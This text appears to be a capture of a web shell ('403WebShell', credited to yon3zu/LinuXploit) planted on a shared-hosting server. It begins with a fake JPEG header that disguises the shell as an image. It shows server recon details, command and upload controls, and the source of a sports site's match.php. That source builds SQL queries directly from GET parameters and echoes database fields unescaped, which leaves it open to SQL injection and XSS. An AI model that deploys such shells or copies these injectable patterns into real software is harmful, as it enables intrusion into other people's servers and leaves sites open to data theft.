����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 18.226.165.234
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/sportsmycareer.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/sportsmycareer.com/match.php
<?php
include './head.php';
include './navbar.php';

function getImageLogo($team)
{
  global $conn;
  $run = mysqli_query($conn, "SELECT `image` FROM `teams` WHERE `team`='$team'") or die(mysqli_error($conn));
  $image = mysqli_fetch_array($run)['image'];

  return $image;
}

if (isset($_GET['fid'])) {
  if (!empty($_GET['fid'])) {
    $id = $_GET['fid'];

    $query = "SELECT * FROM `fixtures` WHERE `fid`=$id";
    $run = mysqli_query($conn, $query) or die(mysqli_error($conn));
    $row = mysqli_fetch_array($run);
  }
}

if (isset($_GET['mid'])) {
  if (!empty($_GET['mid'])) {
    $id = $_GET['mid'];

    $query = "SELECT * FROM `matches` WHERE `mid`=$id";
    $run = mysqli_query($conn, $query) or die(mysqli_error($conn));
    $row = mysqli_fetch_array($run);
  }
}
?>
<header class="page-header" data-background="img/page-header.jpg">
  <div class="container">
    <h2>Match</h2>
    <div class="bosluk3"></div>
    <p><a href="home">Home</a> <i class="flaticon-right-chevron"></i> Match </p>
  </div>
  <!-- end container -->
</header>
<main>
  <!--Upcoming Match Top-->
  <section class="upcoming-section" style="margin-top:5px;padding-top:45px;">
    <div class="container">
      <div class="or-up">
        <div class="row">
          <div class="com-md-12">
            <span class="team-flag-upcoming"><img src="./teams/<?php echo getImageLogo($row['home']); ?>" alt="" width="123" height="141"><?php echo $row['home'] ?></span>
            <h2 class="h2-baslik-anasayfa-ozel-up wow fade"><strong>VS</strong></h2>
            <span class="team-flag-upcoming"><?php echo $row['away'] ?><img src="./teams/<?php echo getImageLogo($row['away']); ?>" alt="" width="123" height="141"></span>
          </div>
        </div>
      </div>
    </div>
    <div class="container">
      <div class="or-date">
        <div class="row">
          <div class="com-md-12">
            <span class="icon-detailw"><i class="flaticon-timetable icon-r"></i><?php echo date('M d, Y', $row['date']) . ' - ' . date('H:i', $row['time']); ?>
            <i class="flaticon-add icon-r1"></i><?php echo $row['venue']; ?></span>
          </div>
        </div>
      </div>
    </div>
  </section>
  <section class="league-fixture-section">
    <div class="container">
      <div class="row">
        <div class="col-md-12">
          <!--Fixture Table-->
          <div class="fixture-result-item-holder ">
            <div class="fc-small-result-wrapper fc-item">
              <?php
              if ($row['home_score'] != '-' && $row['away_score'] != '') {
              ?>
                <div class="small-result-item">
                  <span class="fc-result-match-team fc-left">
                    <span class="fc-team-flag"></span><?php echo $row['home']; ?> <span class="results"><?php echo $row['home_score']; ?></span>
                  </span>
                  <span class="fc-result-match-versus">:</span>
                  <span class="fc-result-match-team fc-right">
                    <span class="results"><?php echo $row['away_score']; ?></span> <?php echo $row['away']; ?>
                  </span>
                </div>
              <?php
              }
              ?>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
  <section class="hakkimizda-bolumu">
    <div class="container">
      <div class="row">
        <div class="col-sm-12">
          <div class="or" style="margin-top:-70px;">
            <h2 class="h2-baslik-anasayfa-ozel-blog wow fade">Match Analysis</h2>
          </div>
          <p class="paragraf wow fade"><?php echo $row['analysis'];?></p>
          <div class="bosluk333"></div>
          <div class="bosluk3"></div>
        </div>
  </section>
  <?php include './footer.php'; ?>
  <script>
    document.querySelector("title").innerText = "SMC - <?php echo $row['home'].''.$row['away'];?>";
    document.querySelectorAll("ul.menueffect li a")[1].style.color = "yellow";
  </script>

Youez - 2016 - github.com/yon3zu
LinuXploit